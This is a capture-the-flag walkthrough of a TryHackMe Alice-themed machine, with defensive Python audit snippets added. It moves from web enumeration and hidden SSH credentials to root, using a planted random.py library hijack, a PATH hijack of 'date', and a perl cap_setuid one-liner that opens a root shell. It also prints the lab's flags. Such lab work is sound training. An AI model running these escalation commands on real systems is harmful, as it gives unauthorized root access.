user hopping
The interesting thing about this machine is that there are quite a few users involved, and we must own them step by step to finally get to root. You can find the machine over at tryhackme.com.
Let's dive right in and start with a port scan:
sudo nmap -sV 10.10.45.109
So: only web and SSH. Since we can't do much with SSH without any credentials, let's look at the web first. While we look at the webpage we run gobuster:
gobuster dir -e -q -t100 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --url 10.10.45.109 -x php,txt,html,js,pdf
The website doesn't reveal anything, and neither does the source code of the page.
There is only the hint to “follow the white rabbit”.
Let’s look at what gobuster revealed:
That's also not too exciting. The img directory contains images, as expected, so let's look at /r first.
There is a page saying “keep going”.
So let's try gobuster one more time, this time on the /r directory:
gobuster dir -e -q -t100 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --url 10.10.45.109/r -x php,txt,html,js,pdf
Hm. We have /r and /a now.
And again the page under /r/a tells us to get going.
So one last time:
gobuster dir -e -q -t100 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --url 10.10.45.109/r/a -x php,txt,html,js,pdf
So the first page told us to “follow the white rabbit”, we now have a URL that reads /r/a/b, and all those pages tell us to keep going.
We will take an educated guess here and see if we find anything at /r/a/b/b/i/t.
OK, another AiW (Alice in Wonderland) quote. Not much to see. Let's look at the source code.
<p style="display: none;">alice:HowDothTheLittleCrocodileImproveHisShiningTail</p>
Finally something interesting.
We will try these credentials on the ssh server that we found earlier.
ssh -l alice 10.10.45.109
That worked. Let's look around.
There are a couple of interesting things here.
We are user alice and looking at our home directory.
There is the root.txt flag, but we can't read it.
There is no user.txt flag, but there is this weird walrus_and_the_carpenter.py, which is also owned by root.
Let’s first see what sudo can do for us:
sudo -l
So we can run /home/alice/walrus_and_the_carpenter.py as user rabbit. That's at least something.
So let's look at the code:
vi walrus_and_the_carpenter.py
We cut it off here because this is already the interesting part.
We cannot change the file, but we see that it imports a library here: random.
So the goal is now to create a Python library that gives us a shell and to sneak it in instead of the original library.
Python looks for libraries in the current directory (the directory the script lives in) before the standard library. So let's try:
echo -n 'import os;os.system("/bin/bash")' > random.py
We know from earlier that we have to run this command as user rabbit. If we did everything right, we should be user rabbit after running walrus_and_the_carpenter.py.
Let's try that:
sudo -u rabbit /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py
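The trick above works because the script's own directory is searched before the standard library. As an added defender-side check (not code from the machine or from TryHackMe), the following Python audit reports which file a name like random would really be imported from; the temporary directory and the fake random.py it creates are constructed for the demo. Keeping sudo-exposed scripts in a root-owned directory, or running them with python3 -I, closes this hole.

```python
"""Detect standard-library modules shadowed by same-named files on the import path.

Added example for this writeup, not code from the machine or TryHackMe: it reports
which file Python would really import for a name like random, which is exactly the
hole the random.py trick above exploits. The demo builds a constructed scenario in
a temporary directory instead of touching a real system.
"""
import importlib.machinery
import os
import sys
import sysconfig
import tempfile

# Where this interpreter's own standard library legitimately lives.
TRUSTED_PREFIXES = tuple(
    os.path.realpath(sysconfig.get_paths()[k]) + os.sep for k in ("stdlib", "platstdlib")
)


def module_origin(name, search_path):
    """Return the file Python would import for `name` from `search_path`, or None."""
    spec = importlib.machinery.PathFinder.find_spec(name, search_path)
    if spec is None or spec.origin in (None, "built-in", "frozen"):
        return None
    return os.path.realpath(spec.origin)


def find_shadowed_stdlib(names, search_path):
    """Return {module: path} for stdlib names that would load from outside the stdlib."""
    shadowed = {}
    for name in names:
        origin = module_origin(name, search_path)
        if origin and not origin.startswith(TRUSTED_PREFIXES):
            shadowed[name] = origin
    return shadowed


def demo():
    """Constructed scenario: a fake random.py sits ahead of the stdlib on the path."""
    names = ["random", "json", "hashlib"]
    with tempfile.TemporaryDirectory() as tmp:
        with open(os.path.join(tmp, "random.py"), "w") as fh:
            fh.write("# constructed placeholder; an attacker's copy would run code here\n")
        clean = find_shadowed_stdlib(names, sys.path)
        # For `python3 script.py`, sys.path[0] is the script's directory (/home/alice
        # above); prepending the temp dir models exactly that position.
        shadowed = find_shadowed_stdlib(names, [tmp] + sys.path)
    return clean, shadowed
```

Run against a real sudo rule, pass the directory of the script in question as the first search path entry; any module it imports that shows up in the result is a candidate for exactly this hijack.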
Since we are user rabbit now, let's look into his home directory:
cd /home/rabbit
ls -la
It seems we should look at the file teaParty, which is owned by root but executable by everybody. That's interesting.
Let's use the strings command to look into it.
Hm. That didn't work. The strings command is not installed, so we have to get the teaParty file to our local system to look into it.
We already know that we can use Python, so we do a simple
python3 -m http.server
which brings up a simple web server for the current directory, listening on port 8000.
On our local machine we then use wget to download the file:
wget http://10.10.45.109:8000/teaParty
Now we can inspect the file as planned.
What we are looking for is something similar to what we looked for in the source code of the Python file earlier:
strings teaParty
reveals an interesting line:
/bin/echo -n 'Probably by ' && date --date='next hour' -R
echo is called via its absolute path, but date is not.
So if we create a file by that name that gives us a shell when executed, and manipulate the PATH variable, that should work:
echo "/bin/bash" > date
chmod +x date
export PATH=/home/rabbit:$PATH
So now when we execute teaParty it will use the PATH variable to find the date command. The first place it looks is now /home/rabbit, where it finds our “version” of the date command and uses that instead of the “correct” one.
That should give us the shell then.
Let's try.
./teaParty
Great. That worked as expected. We are now user hatter.
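The root cause here is a privileged program resolving date through whatever PATH its caller hands it. As an added example (not code from the machine or its teaParty binary), here is a Python audit of PATH entries an unprivileged user could plant a binary in, next to the hardened way of resolving a command against a pinned, root-owned search path; the world-writable directory standing in for /home/rabbit is constructed by the demo.

```python
"""Audit PATH before a program invokes commands by bare name.
Added example for this writeup, not code from the machine or its teaParty binary.
teaParty-style bugs call `date` by bare name under the caller's PATH; the fix is
to resolve commands against a pinned, root-owned search path. The demo constructs
a world-writable directory to stand in for /home/rabbit.
"""
import os
import shutil
import stat
import tempfile

TRUSTED_PATH = "/usr/local/bin:/usr/bin:/bin"  # pinned, root-owned directories only


def risky_path_entries(path_str):
    """Return PATH entries an unprivileged user could plant a binary in: empty or
    relative entries (the cwd), non-root-owned dirs, and group/world-writable
    dirs without the sticky bit."""
    risky = []
    for entry in path_str.split(":"):
        if entry == "" or not os.path.isabs(entry):
            risky.append(entry or "(empty entry = cwd)")
            continue
        try:
            st = os.stat(entry)
        except FileNotFoundError:
            continue  # absent dirs are a separate finding: whoever can create them wins
        loose = st.st_mode & (stat.S_IWGRP | stat.S_IWOTH)
        if st.st_uid != 0 or (loose and not st.st_mode & stat.S_ISVTX):
            risky.append(entry)
    return risky


def resolve_trusted(cmd):
    """Resolve `cmd` against TRUSTED_PATH only, ignoring the caller's PATH."""
    return shutil.which(cmd, path=TRUSTED_PATH)


def demo():
    """Constructed scenario: a writable dir prepended to PATH, like /home/rabbit."""
    with tempfile.TemporaryDirectory() as tmp:
        os.chmod(tmp, 0o777)
        planted = os.path.join(tmp, "date")
        with open(planted, "w") as fh:
            fh.write("#!/bin/sh\n# constructed stand-in for a planted binary\n")
        os.chmod(planted, 0o755)
        path = tmp + ":" + TRUSTED_PATH
        return {"writable_dir": tmp, "risky": risky_path_entries(path),
                "hijacked": shutil.which("date", path=path) == planted,  # teaParty lookup
                "pinned": resolve_trusted("date")}                       # hardened lookup
```

A setuid or sudo-exposed program should either call /bin/date by absolute path, as the echo call already does, or reset PATH to TRUSTED_PATH before any lookup.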
Let’s look into his home directory.
cd /home/hatter
ls -la
We see a file called password.txt in there. Let's cat it:
cat password.txt
Now that we have his password, let's become hatter:
su hatter
Being a bit stuck here, let's look at which files belong to the group hatter that we are now part of:
find / -group hatter 2>/dev/null | more
Now this is interesting. Besides the files in our home directory, /usr/bin/perl5.26.1 and /usr/bin/perl also belong to the group hatter. (The entries below them are just noise.)
Let’s look at them with getcap to see if they have special capabilities.
We will talk about capabilities in a later article. For now it's enough to know that they are an addition to the Linux permission system and that, used carelessly, they can be exploited.
getcap /usr/bin/perl5.26.1
getcap /usr/bin/perl
That looks good. Now that we know that, we can go to https://gtfobins.github.io/gtfobins/perl/#capabilities and look for help.
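From the defender's side, getcap output like this is worth triaging automatically. As an added example (not code from the machine), the following Python snippet parses getcap lines and ranks entries that carry root-equivalent capabilities, treating interpreters as critical; the sample lines are constructed to mirror the situation above and are not the machine's real output.

```python
"""Triage getcap output for file capabilities that amount to root.

Added example for this writeup, not from the machine: the getcap lines are
constructed to mirror the situation above (an interpreter carrying cap_setuid)
plus some benign entries. Handles both output styles, `path = caps` (older
libcap) and `path caps` (libcap 2.41 and newer).
"""
import re

# Capabilities that on their own let a process become root or read any file.
ROOT_EQUIVALENT = {
    "cap_setuid", "cap_setgid", "cap_dac_override", "cap_dac_read_search",
    "cap_sys_admin", "cap_sys_ptrace", "cap_sys_module", "cap_chown",
    "cap_fowner", "cap_setfcap",
}
# Programs that run arbitrary caller-supplied code: any strong cap on them is critical.
INTERPRETER_RE = re.compile(r"^(perl|python|ruby|php|node|lua|tclsh)")

CONSTRUCTED_GETCAP = """\
/usr/bin/perl = cap_setuid+ep
/usr/bin/perl5.26.1 = cap_setuid+ep
/usr/bin/ping = cap_net_raw+ep
/usr/sbin/arping cap_net_raw=ep
/usr/bin/dumpcap = cap_dac_override,cap_net_admin,cap_net_raw+eip
"""


def parse_getcap_line(line):
    """Return (path, {capability names}) for one getcap output line."""
    path, _, caps = line.strip().partition(" = ")
    if not caps:  # newer style: "/path cap_a,cap_b=ep"
        path, _, caps = line.strip().rpartition(" ")
    names = re.split(r"[+=]", caps, maxsplit=1)[0]
    if names == "":  # a bare "=ep" grants every capability
        return path, set(ROOT_EQUIVALENT)
    return path, set(names.split(","))


def triage_getcap(output):
    """Return [(path, severity, risky caps)] for risky entries, critical first."""
    findings = []
    for line in filter(str.strip, output.splitlines()):
        path, caps = parse_getcap_line(line)
        risky = caps & ROOT_EQUIVALENT
        if risky:
            base = path.rsplit("/", 1)[-1]
            severity = "critical" if INTERPRETER_RE.match(base) else "high"
            findings.append((path, severity, sorted(risky)))
    return sorted(findings, key=lambda f: f[1] != "critical")
```

Feed it the output of getcap -r / 2>/dev/null; the fix for a critical finding is to drop the capability with setcap -r on the binary rather than to grant an interpreter any file capability at all.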
There is something for us so let’s try it right away:
/usr/bin/perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
Finally root. That was a long way. Let’s collect the flags now.
We remember that the root flag was in /home/alice:
cat /home/alice/root.txt
thm{Twinkle, twinkle, little bat! How I wonder what you’re at!}
Since the root flag was in a user's home directory, let's see if the user flag is in the home directory of root:
cat /root/user.txt
thm{"Curiouser and curiouser!"}
Conclusion
That was a long one. We had to go from user alice to user rabbit, then to hatter, before we finally got root.
The fun thing is that throughout the process we used a couple of different techniques for privilege escalation.
As always: let me know what you think in the comments below.